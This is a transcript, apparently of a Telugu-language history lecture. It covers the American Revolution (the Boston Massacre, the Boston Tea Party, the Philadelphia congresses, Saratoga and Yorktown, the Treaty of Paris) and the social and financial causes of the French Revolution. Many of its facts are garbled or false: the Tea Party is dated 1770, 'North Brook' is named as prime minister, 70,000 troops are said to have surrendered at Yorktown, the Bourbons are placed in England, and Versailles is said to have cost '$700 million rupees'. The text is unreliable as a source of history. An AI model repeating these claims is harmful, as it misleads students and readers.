తర్వాత టౌన్ షెండ్ వచ్చాడు. ఆ టౌన్ షెండ్ అనేవాడు ఏం చేశాడంటే, మంత్రి వీడు ఇంగ్లాండ్ మంత్రి, తేయాకు పైన మాత్రమే పన్ను ఉంచి మిగతా అన్నిటిపైన రద్దు చేశాడు. తేయాకు పైన ఎందుకు వేశాడంటే పన్నులు విధించే అధికారం మాకు ఉంది అని చెప్పాడు. దీన్ని వ్యతిరేకించినటువంటి అమెరికన్ ప్రజలు ఆ రోజు బోస్టన్లో పెద్ద ఎత్తున నిరసన ప్రదర్శనలు జరిగాయి. అయితే ఇక్కడ 1770 మార్చి 5వ తారీఖున బోస్టన్ హత్యాకాండ అనే ఒక చిన్న సంఘటన జరిగింది. క్రిస్సెస్ మరియు ఐన్ అనే వారి నాయకత్వాన ప్రజలు గుమిగూడి ఇంగ్లాండ్కి వ్యతిరేకంగా పన్నులను వేసినందుకు వ్యతిరేకంగా ప్రజలు పెద్ద ఎత్తున నిరసన తెలిపారు. అయితే ఇక్కడ క్రిస్సెస్ మరియు ఐన్తో పాటు 5 అమెరికన్లు కూడా ఈ బోస్టన్ హత్యాకాండలో చనిపోయింది. ఈ బోస్టన్ హత్యాకాండ మొత్తం 13 వలసల్లో కూడా సంచలనాన్ని రేకెత్తించింది. మొట్టమొదటిసారిగా ఇంగ్లాండ్కి వ్యతిరేకంగా ప్రజల ముందుకొచ్చి వారి పోరాటం చేయడానికి సిద్ధంగా ఉన్నారని నిరూపించిన సంఘటన బోస్టన్ హత్యాకాండ మార్చి 5, 1770లో. అలాగే ఇంకొకటి మనం వింటాం మనం, బోస్టన్ టీ పార్టీ అని. బోస్టన్ టీ పార్టీ 16/12/1770లో జరిగింది. అప్పటి నుండి ప్రధాని నార్త్ బ్రూక్ అనేవాడు తేయాకు పైన పన్ను తీసేయలేదు చెప్పాను. టౌన్ షెడ్ అనేవాడు ఆ విధంగా చేశాడు. అలాగే నార్త్ బ్రూక్ కూడా అదే విధానాన్ని కొనసాగించాడు. దీనితో బోస్టన్ టీ పార్టీ అనేది చాలా ప్రసిద్ధిగాంచింది అమెరికన్ చరిత్రలో. ఏంటి బోస్టన్ టీ పార్టీ అంటే, మనకు తెలుసు అమెరికా ప్రజల కంటే ముందు ఎర్ర ఇండియన్స్ అనే వాళ్ళు ఉండేవాళ్ళు. వారిని మనం రెడ్ ఇండియన్స్ అంటారు. క్రిస్టఫర్ కొలంబస్ అమెరికాలోని మొదటి ప్రజలను రెడ్ ఇండియన్స్ అని పిలిచాడు. కానీ ఈ బోస్టన్ టీ పార్టీలో ఎక్కువ మంది రెడ్ ఇండియన్స్ పనిచేసే వాళ్ళు ఉన్నారు. అమెరికన్స్ ఏం చేశారంటే, ఇప్పుడు రెడ్ ఇండియన్స్ వేషంలో బోస్టన్ రేవులో ప్రవేశించి బోస్టన్ రేవులో ఆ టీ పొడి డబ్బాలను ఎత్తే కూలీలుగా వాళ్ళు నటించి మొత్తం అట్లాంటిక్ మహాసముద్రంలో 342 తేయాకు పెట్టెలను సముద్రంలో పారబోశారు. దీనితో సముద్రమంతా కూడా ఎర్రగా బారింది. దీన్నే అమెరికన్ ప్రజలు ఏమన్నారంటే బోస్టన్ టీ పార్టీ అన్నారు. ఈ బోస్టన్ టీ పార్టీ ఒక చిన్న సంఘటన అయినప్పటికీ ఇది ప్రజల్లో ఒక నూతన ఉత్సవాన్ని, ఉత్తేజితాన్ని కలిగించినటువంటి సంఘటన బోస్టన్ టీ పార్టీ. ఇప్పటికి కూడా వాళ్ళు చాలా రోజులు ఇప్పుడు కూడా జరుపుకుంటున్న సంఘటన బోస్టన్ టీ పార్టీ. ఒక సామ్రాజ్యవాదానికి వ్యతిరేకంగా, వలసవాదానికి వ్యతిరేకంగా, లేదా అన్యాయానికి, అక్రమాలకు వ్యతిరేకంగా నిలదించిన సంఘటనగా బోస్టన్ టీ పార్టీ నిలిచిందని చెప్పేసి మనం చూసుకోవచ్చు. సరే, ఏ దేశంలో అయినా సరే వైజ్ఞానికవేత్తలు లేదా మన ఫిలాసఫర్స్ అని చెప్తాం, ఈ వైజ్ఞానికవేత్తలు లేదా రచయితలు సమాజాన్ని మార్చగలరు. మనం చెప్తున్నాం కత్తి కంటే కలం పదునైనదని చెప్పేసి. అలాగే అమెరికన్లో కూడా అనేక మంది రచయితలు ప్రజలను ప్రభావితం చేశారు. జాన్ లాక్ కానీ, హారింగ్టన్, మిల్టన్, థామస్ జెఫర్సన్, థామస్ పెయిన్,
ఇలాంటి గొప్ప గొప్ప రచయితలు ప్రజలను ప్రధానంగా ప్రజాస్వామ్య భావాల వైపు, పార్లమెంటరీ భావాల వైపు లేదా అధ్యక్ష తరహా ప్రభుత్వాలు ఉండేటట్లుగా వీళ్ళు ప్రజలు ప్రచారం చేశారు. వాళ్ళు అడిగారు, మీ దేశంలో అయితే ఇంగ్లాండ్ పార్లమెంటు చాలా బలోపేతమైనది, అక్కడ కామన్స్ సభ చాలా సంస్కరణలు చేస్తుంది, మా దేశంలో ఇందుకు మీరు రాజరికాన్ని కొనసాగిస్తున్నారు. జాన్ లాక్ అనే ఆయన రాసిన పాంప్లెట్ ప్రధానంగా 2 treatises ఆఫ్ సివిల్ గవర్నమెంట్ అనేది చాలా ప్రసిద్ధిగాంచింది. ఈ 2 treatises సివిల్ గవర్నమెంట్లో అంటే ప్రజలకు కొన్ని సహజ హక్కులు ఉన్నాయి, అంటే స్వేచ్ఛ, సమానత్వం, సౌభ్రాతృత్వం అనే హక్కులు ఉంటాయి. కానీ ఈ స్వేచ్ఛ అనే హక్కుని తీసివేయడానికి ప్రపంచంలో ఎవరికి అధికారం లేదని జాన్ లాక్ అనేవాడు 2 treatises ఆఫ్ సివిల్ గవర్నమెంట్ అనే దాంట్లో ప్రకటించాడు. అలాగే థామస్ జెఫర్సన్ ఆయన కూడా చెప్పాడు, ప్రజలకు తిరుగుబాటు హక్కు ఉంది, ఇది దేవుడు కల్పించినటువంటి హక్కు. ఇది అంటే నిరంకుశ ప్రభుత్వాలను కూల్చే హక్కు అమెరికన్ ప్రజలకు ఉందని థామస్ జెఫర్సన్ అనే వ్యక్తి కూడా చెప్పడం జరిగింది. అలాగే థామస్ పెయిన్ రాసినటువంటి కొటేషన్ ఇంతకుముందు చదువుకున్నాం మనం, ఒక ద్వీపము ఒక ఖండాన్ని పరిపాలించాలనుకోవడం అనేది ఒక అవివేకము, అనౌచిత్యం అని చెప్పేసి పేర్కొన్నవాడు థామస్ పెయిన్. అలాగే ఆ రోజు నుండి హారింగ్టన్ కానీ, మిల్టన్ కానీ ఇలా చాలామంది ప్రధానంగా ఈ అమెరికన్ ప్రజలను వాళ్ళ తరఫున అనేక రచనలు చేశారు. దీనితో అమెరికన్ ప్రజల్లో ప్రధానంగా ఒక చైతన్యం పెళ్ళుబుకుంది. దీనికి అనుగుణంగానే అమెరికా దేశంలో ఫిలడెల్ఫియా సమావేశాలు జరిగాయి. ఫిలడెల్ఫియా అనేది అమెరికాలో ఒక నగరం. ఇది దీన్ని మనం ఏమని పిలుస్తామంటే అమెరికా ఖండ మహాసభలు అని చెప్పేసి మనకు 3 జరిగాయి. 1774, 1775, 1776లో 3 అమెరికా ఖండ మహాసభలు జరిగాయి. మొదటి అమెరికా ఖండ మహాసభ మనకు ఫిలడెల్ఫియాలో జరిగింది. ఈ ఫిలడెల్ఫియా సమావేశానికి ఒక జార్జియా తప్ప మిగతా 12 వలసలు లేదా 12 రాష్ట్రాలు హాజరయ్యాయి. వీళ్ళంతా అప్పుడున్న ఇంగ్లాండ్ రాజు 3వ జార్జికి ఒక పిటిషన్ తయారు చేసి ఇచ్చారు. మా పైన పన్నులు తగ్గించండి, మాకు శాసనసభలో అవకాశాన్ని కల్పించండి, ఇంగ్లాండ్ దేశంలాగే మమ్మల్ని పరిపాలించాలని చెప్పేసి 1774లో ఫిలడెల్ఫియా సమావేశంలో ఆ సమావేశం తీర్మానం చేసి 3వ జార్జికి అంటే అప్పుడు ఇంగ్లాండ్ రాజుకు అందించారు. 2వ మహాసభ కూడా జరిగింది, ఫిలడెల్ఫియాలోనే జరిగింది. మనం బాగా గుర్తుంచుకోవడానికి ఒకే సమావేశం ఫిలడెల్ఫియాలోనే జరిగాయి కాబట్టి బాగా గుర్తుంచుకోవచ్చు. ఫిలడెల్ఫియా 2వ మహాసభలో కూడా 3వ జార్జికి మళ్ళీ విన్నపం చేశారు. అయితే దానికి అనుగుణంగా లేడని భావించి 2వ ఫిలడెల్ఫియా సమావేశంలోనే అమెరికన్ గొప్ప నాయకుడు జార్జి వాషింగ్టన్ను అమెరికన్ సైన్యాలకు నాయకత్వం వహించవలసిందిగా కూడా కోరారు. ఇది గొప్ప మలుపు అమెరికా దేశ చరిత్రలోనే. ఇది సాయుధ పోరాటానికి నాంది పలికిన సంఘటనగా చెబుతారు. 2వ ఫిలడెల్ఫియా సమావేశంలో జార్జి వాషింగ్టన్కు సైనిక నాయకత్వం అప్పగించడం అనేది. అలాగే 3వ ఫిలడెల్ఫియా సమావేశం 1776లో అమెరికా ఖండ మహాసభ జరిగింది. దీంట్లో ప్రధానంగా బాగా గుర్తుంచుకోవాల్సినది మనము అమెరికా స్వాతంత్ర ప్రకటన తయారు చేయబడింది. అమెరికా ప్రజలమైన మేము ఒకే జాతి, ఒకే ప్రజ, ఒకే దేశం. ఈ నినాదము మనం గమనించినట్లయితే వలసలన్నీ ఒక దేశంగా రూపొందాలని స్వాతంత్ర తీర్మానాన్ని ఏర్పాటు చేసుకున్నారు 1776లో ఫిలడెల్ఫియా సమావేశంలో. ఈ ఫిలడెల్ఫియా సమావేశంలో స్వాతంత్ర ప్రకటన తయారు చేసిన వాడు థామస్ జెఫర్సన్. థామస్ జెఫర్సన్ను తయారు చేసిన ఈ స్వాతంత్ర ప్రకటన దీనికి సహాయం చేసిన వారు జాన్ మెసన్ అనేవాడు. ఇతడు వ్రాసిన డిక్లరేషన్ ఆఫ్ ఇండిపెండెన్స్ మరియు జాన్ లాక్ వ్రాసిన 2 treatises ఆఫ్ సివిల్ గవర్నమెంట్ అనే 2 గ్రంథాలు కూడా అమెరికా స్వాతంత్ర ప్రకటనకు తోడ్పాటు అందించాయి. సరే, వీళ్ళిద్దరి సహకారంతో థామస్ జెఫర్సన్ అనేవాడు ఒకే జాతి, ఒకే ప్రజ, ఒకే దేశం అనే నినాదంతో అమెరికా స్వాతంత్ర ప్రకటన జూలై 4, 1776లో ప్రధానంగా దీన్ని తయారు చేశాడు. ఈరోజు కూడా జూలై 4వ తారీఖును అమెరికన్ ప్రజలు ప్రధానంగా తమ స్వాతంత్ర దినోత్సవంగా జరుపుకోవడం మనము గమనించవచ్చు. ఈ స్వాతంత్ర ప్రకటన తర్వాత ఇక అమెరికా యుద్ధం ప్రారంభమైంది. అమెరికా యుద్ధం ప్రధానంగా అమెరికా సైన్యాలకు నాయకత్వం వహించిన వాడు జార్జి వాషింగ్టన్. నిజంగా ఇంగ్లాండ్ దేశంతో పోల్చుకుంటే అమెరికా ప్రజలు దగ్గర ఆయుధాలు లేవు, సరైన దుస్తులు లేవు, వాళ్ళు వేసుకునేటువంటి బూట్లు కూడా లేవు. ఏమి లేని సందర్భంలో కూడా అమెరికన్ ప్రజలు ఆత్మవిశ్వాసంతో, ధైర్య సాహసాలతో
ఇంగ్లాండ్కు వ్యతిరేకంగా యుద్ధాన్ని ఆరంభించారు. నిజంగా ప్రపంచ చరిత్రలో ఒక గొప్ప అధ్యాయం. అయితే ఇక్కడ ఏంటంటే ప్రధానంగా ఇంగ్లాండ్ దేశం ఈ అమెరికన్ స్వాతంత్ర పోరాటం అణిచివేయడానికి పూనుకుంది. అయితే అమెరికా ప్రజలకు ఆ రోజు ప్రపంచవ్యాప్తంగా ప్రధానంగా వాళ్ళకు సపోర్ట్ ప్రధానంగా వాళ్ళకు అనేక మంది సపోర్ట్ చేశారు. ఏంటంటే స్పెయిన్ కానీ ఫ్రాన్స్ దేశం కానీ ఇంగ్లాండ్కు వ్యతిరేక దేశాలు. మనకు తెలుసు ఇంగ్లాండ్ ఫ్రాన్స్ దేశాలు అగర్భ శత్రువులు. వీళ్ళు మన భారతదేశంలో 3 కర్ణాటక యుద్ధాలు చేసుకున్నారు. ఇదంతా కూడా ఫ్రాన్స్కు ప్రధానంగా చాలా కోపం ఉంది. ఇంగ్లాండ్ దేశాన్ని ఎలాగైనా సరే ఓడించాలని చెప్పేసి అనుకుంటుంది. ఇప్పుడు అవకాశం కలిగింది. అమెరికన్ ప్రజలు తిరుగుబాటు చేశారు. ఈ విప్లవానికి ఫ్రాన్స్ దేశము తన సహాయ సహకారాలను సైనిక సహకారాలను అందించిన దేశము ఫ్రాన్స్ దేశం. అలాగే స్పెయిన్ దేశం కూడా అమెరికా దేశానికి సహాయాన్ని అందించింది. ఏమైనప్పటికీ ఇంగ్లాండ్ దేశం ఏం చేసిందంటే ఇంగ్లాండ్ గొప్ప గొప్ప సేనాధిపతులను అమెరికా విప్లవాన్ని అణిచివేయడానికి అమెరికా దేశానికి పంపింది. ఆ రోజులుండే గొప్ప సేనాధిపతులు గేజ్ కానీ హావే కానీ కార్న్ వాలిస్ కానీ బర్గాయిష్, వీళ్ళు గొప్ప సేనాధిపతులు. మనం అదే అమెరికాలో చూస్తే ఒకే ఒక పేరు వింటాం, జార్జ్ వాషింగ్టన్ అనే ఆయన పేరు వింటాం మనం. మిగతా వాళ్ళు కూడా ప్రముఖులు ఉన్నారు, కానీ మనకు బాగా తెలిసిన వ్యక్తి జార్జ్ వాషింగ్టన్. సరే, ముందు అమెరికాలో ఒక చిన్న సంఘటన జరిగింది. 1775లో లెక్సింగ్టన్ అనే చోట ఒక చిన్న యుద్ధం జరిగింది. లెక్సింగ్టన్ అనే చోట జరిగిన యుద్ధంలో కొంతమంది అమెరికన్ సైనికులు ప్రాణాలు కోల్పోయారు. అయితే ఇక్కడ పేలిన తుపాకీ గుండు మొత్తం అమెరికా ఖండానికే వినిపించింది అని చెప్పేసి ఒక నానుడు ఉంది. అంటే లెక్సింగ్టన్లో పేలిన తుపాకీ గుండు అమెరికా ఖండాన్నే ప్రభావితం చేసింది. అందరూ కూడా విన్నారు, అరే ఇక్కడ యుద్ధం ప్రారంభమైంది, ఇక మనం కూడా యుద్ధంలో పార్టిసిపేట్ చేయాలి, మనం కూడా యుద్ధాన్ని కొనసాగించాలని ఒక ధైర్యాన్ని కలిగించినటువంటి ఒక చిన్న సంఘటన ప్రధానంగా లెక్సింగ్టన్ అనే యుద్ధం. సరే, లెక్సింగ్టన్ యుద్ధం తర్వాత మనకు బంకర్ హిల్ యుద్ధము, అలాగే సారటాగో అనే యుద్ధాలు కూడా జరిగాయి. చాలా యుద్ధాల్లో ఇంగ్లాండే జయించినప్పటికీ కానీ కొన్ని ప్రముఖమైన యుద్ధాలు సారటాగో యుద్ధము కానీ అలాగే యార్క్ టౌన్ యుద్ధాలు కానీ అమెరికా చరిత్రను మార్చివేసిన ఈ 2 యుద్ధాలు సారటోగో యుద్ధము మరియు యార్క్ టౌన్ అనే యుద్ధం. సారటాగో అనే యుద్ధము బర్గాయిష్ నాయకత్వంలో ఉన్న ఇంగ్లాండ్ సైన్యాన్ని ఘోరంగా ఓడించారు అమెరికా వారు. నిజంగా ఇది ఒక గొప్ప ఫలితాన్ని కనపరిచింది. అమెరికన్ ప్రజల్లో ఉత్సాహాన్ని నింపింది. ఇంకొక యుద్ధానికి సిద్ధమయ్యారు. అలాగే ఫ్రాన్స్ సైన్యాధిపతి లఫాయత్ అనేవాడు స్వయంగా అమెరికా స్వాతంత్ర పోరాటంలో పాల్గొని అమెరికన్లకు సహాయం చేశాడు. చివరిగా 1781లో జరిగిన యార్క్ టౌన్ అనే యుద్ధంలో కార్న్ వాలిస్ ఇంగ్లాండ్ సేనాధిపతి యుద్ధంలో ఓడిపోయి 70,000 మంది సైన్యంతో అమెరికన్లకు లొంగిపోయాడు. నిజంగా ఇది ఇంగ్లాండ్ దేశానికి అత్యంత అవమానకరమైనటువంటి సంఘటన. కార్న్ వాలిస్ మనం చూస్తాం, భారతదేశంలో కూడా అతని పరిపాలనా కాలం మనకు తెలిసిందే. కానీ అంతకంటే ముందు ఇంగ్లాండ్లో ఇతడు యుద్ధం చేసి లొంగిపోయిన వ్యక్తి కార్న్ వాలిస్ అనేవాడు మనకు గుర్తుంచుకోవాలి. సరే, కార్న్ వాలిస్ లొంగిపోయిన తర్వాత 1783 వరకు చిన్న చిన్న యుద్ధాలు జరిగాయి. చివరికి ఇంగ్లాండ్ దేశం ఇక యుద్ధాన్ని విరమించాలనుకున్నది. ప్రపంచవ్యాప్తంగా శత్రువులు అధికమైపోయారు, ఒత్తిడి పెరిగిపోయింది. ఇంగ్లాండ్లో ఉండే మాతృదేశంలో కూడా మీరు మాతృదేశ ప్రజలపైన యుద్ధం చేస్తున్నారనే ఒక చర్చ ప్రారంభమైంది. దీనితో ఫ్రాన్స్ యొక్క మధ్యవర్తిత్వంతో 1783లో ప్యారిస్ సంధి జరిగింది. ఈ ప్యారిస్ సంధితో యుద్ధం ముగిసింది. ప్యారిస్ సంధి ప్రధానంగా ఈ 2 దేశాల మధ్య, ఇంగ్లాండ్ అమెరికా దేశాల మధ్య ఆ యుద్ధ సమాప్తి సంధిని కుదిర్చి అమెరికా దేశానికి స్వాతంత్రం రావడానికి కారణమైంది. అమెరికా దేశానికి స్వాతంత్రం వచ్చిన తర్వాత మనకు జార్జ్ వాషింగ్టన్ ఆయన మొట్టమొదటిసారిగా దేశ అధ్యక్షుడయ్యాడు. ఇతని కాలంలో అమెరికా ప్రధానంగా అనేక రంగాల్లో ముందు అధిగమించింది. ఈరోజు ప్రపంచంలోనే ఒక గొప్ప దేశంగా అవతరించిన దేశం అమెరికా దేశం. అమెరికా దేశం మనకు పార్లమెంటరీ విధానంలోనే అధ్యక్ష తరహా ప్రభుత్వాన్ని ఏర్పాటు చేసిన మొట్టమొదటి దేశం అమెరికా దేశంగా చరిత్రలో నిలిచిపోయింది. అలాగే ప్రపంచంలోనే మొదటి లిఖిత రాజ్యాంగాన్ని అందించిన దేశంగా ప్రపంచంలో ప్రసిద్ధిగాంచింది అమెరికా దేశం. కానీ అమెరికా ఖండంలోనే గాక అలాగే ప్రపంచంలోనే లిఖిత రాజ్యాంగాన్ని ఏర్పాటు చేసుకుంది. అలాగే ప్రపంచంలో ఒక ఉత్సాహాన్ని నింపింది.
వలసలు సైతము తిరుగుబాటు చేసే హక్కును కలిగి ఉన్నాయని నిరూపించిన విప్లవము అమెరికా విప్లవము. ఫ్రెంచ్ విప్లవం 1789. ఈ మాట వినగానే ప్రపంచంలో విప్లవకారులకు జూలై 14 అనే డేటు అందరికీ గుర్తొస్తుంది. ప్రపంచంలో స్వేచ్ఛ, సమానత్వము, సౌభ్రాతృత్వము అనే పదాలను ప్రపంచానికి పరిచయం చేసిన దేశం ఫ్రాన్స్ దేశం. విప్లవాల మాతగా ప్రసిద్ధికెక్కిన దేశం ఫ్రాన్స్ దేశం. ఫ్రెంచ్ విప్లవం మొదటిసారిగా రాజరికానికి చరమగీతం పాడి ప్రజాస్వామ్య హక్కులను ప్రజలకు అందించిన విప్లవమే ఫ్రాన్స్ విప్లవం. ఫ్రాన్స్ విప్లవం ఇది ఏదో ఒక ఉల్కలాగా హఠాత్తుగా సంభవించిన విప్లవం కాదు. అనేక చారిత్రక పరిణామాల ద్వారానే వచ్చిందని లార్డ్ యాక్టన్ అనే చరిత్రకారుడు పేర్కొన్నాడు. అంటే అకస్మాత్తుగా సంభవించలేదు. దీనికి అనేక కారణాలున్నాయి. ఫ్రాన్స్లో ఉండే కారణాల వల్లనే ఫ్రాన్స్లో విప్లవం వచ్చింది. ఫ్రాన్స్లో ప్రధానంగా బూర్బన్ అనే వంశం పరిపాలిస్తూ ఉంది. ఈ బూర్బన్లు నిరంకుశులు. ఎలాగైతే ఇంగ్లాండ్ దేశంలో ట్యూడర్లు, స్టూవర్ట్లు ఉన్నారో, రష్యా దేశంలో రోమనో వంశస్థులు ఉన్నారో, ఇంగ్లాండ్లో ఉండే బూర్బన్లు కూడా నిరంకుశులు. ఫ్రాన్స్ దేశాన్ని పరిపాలించిన ఈ బూర్బన్లలో మనం చెప్పుకున్నట్లయితే 14వ లూయి, 15వ లూయి, 16వ లూయిలు గురించి మనం కొంచెం చెప్పుకోవాలి. 14వ లూయి నిరంకుశుడు. తన జీవితాంతము అనేక యుద్ధాలు చేశాడు. నేనే చక్రవర్తి, ఐ ఆమ్ ద స్టేట్, నేనే రాజ్యాన్ని అని ప్రకటించుకున్న వ్యక్తి 14వ లూయి. అట్లాగే గ్రాండ్ మోనార్క్ అనే దాన్ని ఏర్పాటు చేసుకొని వైభవోపేతమైన చక్రవర్తి, సూర్య చక్రవర్తి అని పిలిపించుకున్నవాడు 14వ లూయి. తన యొక్క ఆర్థికాన్ని మొత్తం కూడా, అంటే దేశ సంపదను మొత్తం కూడా ఈ యుద్ధాల కోసం, కట్టడాల కోసం వెచ్చించిన వ్యక్తి 14వ లూయి. 14వ లూయి వర్సేల్స్ అనే ఒక అద్దాల భవనాన్ని కట్టించాడు. దీనికి ఆ రోజుల్లోనే $700 మిలియన్ల రూపాయలు ఖర్చయిందంట. అంత పెద్ద భవనాన్ని కట్టించాడు. అందుకే 14వ లూయి చనిపోయినప్పుడు ప్రధానంగా అతని శవదహనానికి కూడా డబ్బులు లేని పరిస్థితి మనం ఫ్రాన్స్లో చూస్తాం. అట్లాగే 15వ లూయి వచ్చాడు. 15వ లూయి సోమరిపోతు. 14వ లూయి చెప్పి వెళ్ళాడు, నాయనా నేను అనేక యుద్ధాల్లో పాల్గొన్నాను, దేశ సంపదంతా నాశనమైంది, నువ్వు యుద్ధాలు చేయొద్దు అన్నాడు. కానీ 15వ లూయి ఏమాత్రం పట్టించుకోక ఏమనేవాడంటే, ఇతడు తరచుగా నా తర్వాత ప్రళయం వచ్చును, అంటే నేను పోయిన తర్వాత ఈ దేశంలో విప్లవం వస్తుందని చెప్పేసి తరచుగా చెప్పేవాడు. ఇతడు ఎటువంటి చర్యలు తీసుకోవడం వల్ల ఇక విప్లవం దగ్గరగా వచ్చింది అదే ఫ్రాన్స్ విప్లవం. ఇక చివరిగా 16వ లూయి అనేవాడు వచ్చాడు. 16వ లూయి ఇతడు నిజంగా ఆ రోజున పరిస్థితి చక్కదిద్దలేకపోయాడు. 16వ లూయి ప్రధానంగా ఆస్ట్రియా రాకుమార్తె ఇతడు మేరీ ఆంతోవెత్నెత్ను పెళ్లి చేసుకున్నాడు. మేరీ ఆంతోనెట్ అని చెప్పేస్తాం. ఈమెను ఏమనేవారంటే ప్రజలు ఆస్ట్రియా మేడం అనేవాళ్ళు. ఎందుకంటే ఈమెకు ఫ్రాన్స్ భాష రాదు, అంటే ఫ్రెంచ్ భాష మాట్లాడడానికి రాదు. అందరూ ఈమెను ఆస్ట్రియా మేడం పిలిచేవాళ్ళు. ఎందుకంటే ఈమె ఫ్రాన్స్ యొక్క సాంప్రదాయాలను గౌరవించేది కాదని భావించేవాళ్ళు. అయితే ఈమె రాజకీయాల్లో ఎక్కువగా జోక్యం చేసుకున్న ఆమె మేరీ ఆంతోనెత్ 16వ లూయి భార్య. సో 16వ లూయి భార్య ఈ 16వ లూయి కానీ 15వ లూయి కానీ 14వ లూయి వీరు అనుసరించిన రాజకీయ విధానాల మూలంగానే, అంటే నిరంకుశ రాజరికాన్ని అనుసరించడము, ఎడతెగిన యుద్ధాలు చేయడము, అట్లాగే దేశ సంపదంతా కూడా వైభవోపేతమైన కడ్డాలకు ఖర్చు చేయడం వల్ల ప్రజలు ఆర్థికంగా దిగజారిపోయారు. దీనితో ప్రజలు ప్రధానంగా యుద్ధానికి సిద్ధంగా ఉన్నట్లుగా మనకు కనిపిస్తుంది.
అలాగే ఫ్రాన్స్ సమాజాన్ని చూసినట్లయితే ఫ్రాన్స్ సమాజం 2 వర్గాలుగా చీలిపోయి ఉంది. వాటిని మనం ఏమంటామంటే ప్రివిలైజ్డ్ మరియు అన్ప్రివిలైజ్డ్. మామూలుగా ఉన్నత వర్గము, సామాన్య వర్గము. ఉన్నత వర్గంలో ప్రధానంగా మతాచార్యులు, వీళ్ళు కేవలం 1,30,000 మంది మాత్రమే ఉన్నారు. భూస్వాములు 1000 మంది మాత్రమే ఉన్నారు. కానీ 3వ వర్గంలో ఉన్న సామాన్య ప్రజలు ప్రధానంగా 90% మంది ఉన్నారు. ఈ 90% మంది ప్రజలు దీనిలో మధ్యతరగతి వాళ్ళు ఉన్నారు, చదువుకున్న వాళ్ళు ఉన్నారు, చిన్న చిన్న వ్యాపారాలు చేసే వాళ్ళు ఉన్నారు, పేద ప్రజలు కూడా ఉన్నారు. అయితే పేద ప్రజలు అనేక పన్నులు కడుతూ వీళ్ళిద్దరిని కూడా మోస్తున్నారు. మనం ఇక్కడ చూస్తే కండిషన్స్ ఆఫ్ కామన్ పీపుల్ అని, ఇక్కడ మతాచార్యులు, భూస్వాములు సామాన్యులపైన స్వారీ చేయడం మనం గమనించవచ్చు. కానీ ఇటువంటి వ్యవస్థ నిజంగా ఎక్కడ ప్రపంచంలో ఐరోపా ఖండంలో ఉన్నప్పటికీ ఇది ఫ్రాన్స్లో ఎక్కువగా మనకు కనిపిస్తుంది. ప్రజలు రకరకాలైన పన్నులు చెల్లించేవాళ్ళు. ఉదాహరణకు బైలీ అనే భూమి పన్ను, గాబెల్లా అనే ఉప్పు పన్ను, క్వారీ అనే రహదారి పన్ను, విన్జిటీమ్ అనే ఆదాయ పన్ను, ఇలా రకరకాలైన పన్నులు చెల్లించాల్సి వచ్చింది. ఎందుకంటే రాజుకు తన ఆడంబరాలు చూపించుకోవడానికి ప్రజల నుండే పన్నులు కావాలి కాబట్టి, వాళ్ళ ద్వారా ఆదాయం వస్తుంది కాబట్టి ఎక్కువ పన్నులు విధించేవాడు. అందుకే ఒక నానుడు ఉంది ఆ రోజుల్లో, ఇది చాలా ఫేమస్ కొటేషన్గా తయారైంది ఆ రోజుల్లో. రాజులు యుద్ధం చేస్తే, మతాధికారులు ప్రార్థనలు చేస్తే సామాన్యులు పన్నులు కట్టాలి అనేది ఒకటి ఉంది. అట్లాగే ఫ్రాన్స్లో 90% మంది తిండి లేక మరణించగా 10% మంది తిన్నది అరగక మరణించారు. ఈ రెండు మనం గమనించినట్లయితే మతాధికారులు, ప్రభువులు వీళ్ళకేం పని లేదు. అంటే వీళ్ళు ఎక్కడ కూడా ఉత్పత్తిలో భాగస్వామ్యమే లేదు. అసలుకు ఉత్పత్తిలో భాగస్వామ్యం కాకుండానే అన్ని సౌకర్యాలు అనుభవిస్తున్నారు. అంటే ఏదైనా ఉత్పత్తి కావాలంటే మానవ శ్రమ కావాలి. మానవ శ్రమ భాగం కాకుండానే వీళ్ళు అనేక వైభవోపేతమైన జీవితం గడుపుతున్నారు. కానీ సామాన్య ప్రజలు మాత్రం వీళ్ళు ప్రధాన పనులు కడుతున్నారు. అదే మనకి ఇక్కడ కండిషన్స్ ఆఫ్ కామన్ పీపుల్లో మనము గమనించవచ్చు. ఇద్దరు కూడా స్వారీ చేయడం సామాన్య ప్రజలపైన. అట్లాగే ఫ్రాన్స్లో 90% మంది తిండి లేక మరణించారు. నిజంగా 10% మంది తిన్నది అరగక మరణించారంటే ఆ 10% మంది ఎవరంటే ప్రభువులు మరియు మతాధికారులు. కానీ ఈ పరిస్థితి తోడుగా ఆర్థిక పరిస్థితులు కూడా ఫ్రాన్స్ దేశంలో విప్లవానికి కారణమయ్యాయి. ఫ్రాన్స్ దేశంలో ఎక్కువ భాగము రాజకుటుంబ వినోదాలకు లేదా మేరీ ఆంతోను నివసించే వర్సేల్స్ అద్దాల భవనంలో ఉండే దాన్ని మెయింటైన్ చేయడానికి అనేక డబ్బులు ఖర్చు అయ్యేవి. ఈమె అలంకరణకు ఎక్కువగా ప్రాధాన్యత ఇచ్చేదట. అందుకే ప్రజల గురించి పెద్దగా పట్టించుకునేది కాదు. ఈమెకు అన్నం కానీ బ్రెడ్ విషయం కానీ పెద్దగా ఈమెకు దాని పట్ల ఉన్నటువంటి ఎంత ఖరీదు తెలియదు. ఒకసారి మేరీ ఆంతోనతును ప్రజలు వచ్చి అడిగారంట, మాకు బ్రెడ్ కావాలని చెప్పేసి అడిగితే ఆమె అన్నదట, ఎందుకు మీరు కేక్ తినవచ్చు కదా అని చెప్పిందంట. మన ఉదాహరణ చెప్పుకుంటే మనకు అన్నం కావాలని మనం అడిగితే నువ్వు బిర్యానీ తినవచ్చు కదా అంటే ఎలా ఉంటుంది? అలాగే మేరీ ఆంతోనత్ కూడా ఆ రోజులు అదే అన్నదంట, మాకు అన్నం కావాలంటే మీరు బిర్యానీ తినవచ్చు కదా అని చెప్పేసి చెప్పిందంట. అంటే మేరీ ఆంతోనత్కు అన్నానికి బిర్యానీకి మధ్య తేడా తెలియని పరిస్థితి మేరీ ఆంతోనత్కు ఉంది. అట్లాగే ఆ రోజు జాతీయ రుణము 600 మిలియన్లకు చేరుకుంది. ప్రతి సంవత్సరము లోటు కూడా 25 మిలియన్లకు చేరుకుంది. అయితే ఈ ఆర్థిక దుస్థితిని చక్కదిద్దడానికి గొప్ప గొప్ప ఆర్థిక మంత్రులు ఉన్నారు ఫ్రాన్స్లో. టర్గో కానీ, నెక్కర్ కానీ, కొలోను కానీ, ఆర్చ్ బిషప్ మింబ్రియన్ కానీ ఇలా అంతా ఉన్నారు. కానీ వీళ్ళందరినీ కూడా ఎవరు కంట్రోల్ చేస్తున్నారు? మేరీ ఆంతోనెత్తు మరియు 16వ లూయి. 16వ లూయి పూర్తిగా భార్య చేతిలో కీలుబొమ్మ అయిపోయాడు. అందుకే 